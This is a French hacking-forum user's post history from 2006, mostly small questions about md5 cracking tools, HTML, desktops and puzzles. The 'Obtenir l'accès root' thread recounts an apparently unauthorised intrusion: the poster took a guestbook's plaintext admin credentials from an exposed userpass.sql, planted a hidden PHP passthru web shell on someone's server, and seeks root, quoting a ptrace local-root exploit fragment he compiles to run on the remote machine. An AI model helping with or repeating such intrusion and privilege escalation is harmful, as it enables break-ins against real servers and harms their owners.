logo Homepage
+  NewbieContest
Username:
Password:
  Voir les messages
Pages: [1]
1  Divers / Hacking / Les md5 le: 10 Août 2006 à 05:42:03
Salut, il y a pas longtemps, alors que j'étais sous Windows, j'utilisais Cain pour bruteforcer les md5.

Je voudrais savoir si vous connaissez l'équivalent sur Linux, pour bruteforcer les md5 pures(ceux de 32 caractères). J'ai essayé John the Ripper, mais il ne fonctionne apparemment qu'avec des variantes de md5. Tant qu'à MDCrack, il ne compile pas sur mon ordi 64 bit.

C'est ça qui est ça..

Auriez-vous une solution?
2  Divers / Informatique / Id le: 10 Août 2006 à 05:25:44
ID = identification

En HTML, c'est la manière d'identifier, par exemple, un champ de formulaire.
Ex:

<form id="mon_formulaire">

On pourra donc accéder au formulaire par son ID, c'est-à-dire "mon_formulaire".

Mouais en fait c'est juste le nom que l'on donne à quelque chose
3  Général / Defouloir / Vos Bureaux ! le: 09 Août 2006 à 22:35:38
Gob -> Ou as-tu trouvé ce thème
J'ai Ubuntu Dapper Drake aussi et mon desktop est moche.
C'est un thème personnalisé manuellement?
4  Challenges / Aide Logique / Logique - Nombre de carrés le: 05 Août 2006 à 04:37:01
Yeah j'ai trouvé

Y fallait imbriquer finalement
5  Challenges / Aide Logique / Logique - Nombre de carrés le: 05 Août 2006 à 01:57:47
Est-ce qu'on a droit d'imbriquer les carrés(de les embarquer un par dessus l'autre) ou chaque case ne peut être utilisée qu'une fois?
6  Général / Suggestions/Dev. du site / Crackme et Linux le: 03 Août 2006 à 18:34:13
Salut, j'ai une suggestion concernant les épreuves de crackme.

Je crois que ce serait bien si on aurait des exécutables fonctionnant sous Linux:)
Apparemment, ce système d'exploitation est plus adapté pour le genre d'activités que l'on fait sur ce site.

Cessons de dépendre de Billou!

Et au fait, est-ce qu'il y a quelqu'un qui connaît un bon désassembleur et éditeur hexa pour Linux:?:
7  News / News Informatique/Hardware/Tuning / Ha Microsoft quand tu nous tiens! (ca vous rappelle pas une citation?) le: 03 Août 2006 à 08:26:11
J'ai entendu dire que le fameux "blue screen of death" serait rouge dans Vista  .. c'est vrai:?:
8  Divers / Hacking / Obtenir l'accès root le: 30 Juillet 2006 à 21:31:15
Lol c'est pas mauvais comme idée, j'y avais même pas pensé
9  Divers / Hacking / Obtenir l'accès root le: 30 Juillet 2006 à 18:14:06
Merde, y a-t-il un moyen de compiler ce programme sur une architecture 64 bits pour qu'il fonctionne sur un système 32 bits?
10  Divers / Hacking / Obtenir l'accès root le: 30 Juillet 2006 à 17:28:52
Hey, merci, le programme a bien compilé cette fois.
Reste plus qu'à l'exécuter sur l'ordinateur distant et voir ce que ça donne..
11  Divers / Hacking / Obtenir l'accès root le: 29 Juillet 2006 à 18:48:53
J'ai essayé de compiler un exploit en C, mais j'obtiens l'erreur suivante:

Exploit.c: In function ‘sigchld’:
Exploit.c:93: error: ‘struct user_regs_struct’ has no member named ‘eip’
Exploit.c:95: error: ‘struct user_regs_struct’ has no member named ‘eip’


Voici le bout de code correspondant:

void sigchld(int signo)
{
   struct user_regs_struct regs;

   if (gotchild++ == 0)
      return;
   
   fprintf(stderr, "
  • Signal caught\n");

   if (ptrace(PTRACE_GETREGS, victim, NULL, &regs) == -1)
      fatal("[-] Unable to read registers");
   
   fprintf(stderr, "
  • Shellcode placed at 0x%08lx\n", regs.eip);
   
   putcode((unsigned long *)regs.eip);

   fprintf(stderr, "
  • Now wait for suid shell...\n");

   if (ptrace(PTRACE_DETACH, victim, 0, 0) == -1)
      fatal("[-] Unable to detach from victim");

   exit(0);
}

Pourtant, en regardant sur Google, j'ai vu d'autres programmes utilisant la structure user_regs_struct et il n'y avait pas d'erreurs..

Est-ce que ça peut être causé à cause d'une distribution 64 bit?
12  Divers / Hacking / Obtenir l'accès root le: 29 Juillet 2006 à 17:43:41
Mmm j'ai regardé et c'est un vieux kernel:2.4.20. Il doit bien avoir d'autres exploits de ce genre !

Merci pour la réponse!
13  Divers / Hacking / Obtenir l'accès root le: 29 Juillet 2006 à 09:00:00
Bonjour à tous!

J'aurais besoin d'aide pour quelque chose sur laquelle je me casse la tête depuis longtemps.

Premièrement, mes intentions ne sont pas mauvaises du tout, je fais tout ça dans le but d'apprendre.

Alors voilà, pour commencer, j'ai obtenu l'accès au panneau d'administration(Easy Admin) d'un guestbook grâce à un fichier nommé "userpass.sql" qui traînait sur le serveur. Alors j'ai vu qu'on pouvait éditer les templates de n'importe quelle page. J'ai donc décidé d'éditer une page déjà existante nommée index.php(l'accueil du guestbook) et de faire en sorte qu'on puisse passer des commandes au shell à l'aide de cette page, en toute discrétion, en utilisant la commande passthru de PHP. Je peux alors lister tous les fichiers du serveur en insérant ma commande dans une url modifiée.

Mais le problème est que lorsque j'utilise la commande whoami, le nom de l'utilisateur qui apparaît n'est pas root, mais celui d'un utilisateur ordinaire(ce qui est normal d'ailleurs). Mais je voudrais savoir s'il y a moyen de trouver ce mot de passe quelque part dans le système. J'ai essayé de regarder dans /etc/passwd, mais le mot de passe est shadowé, donc impossible de le voir tant qu'on est pas en root.

Si vous avez une idée, ce serait bien de la partager !



PS: Plusieurs GuestBook "Advanced guestbook" comportent le fichier userpass.sql (http://www.xxxxxx.com/guestbook/doc) qui lui-même contient le mot de passe et le username non encrypté du panneau d'administration.
Pages: [1]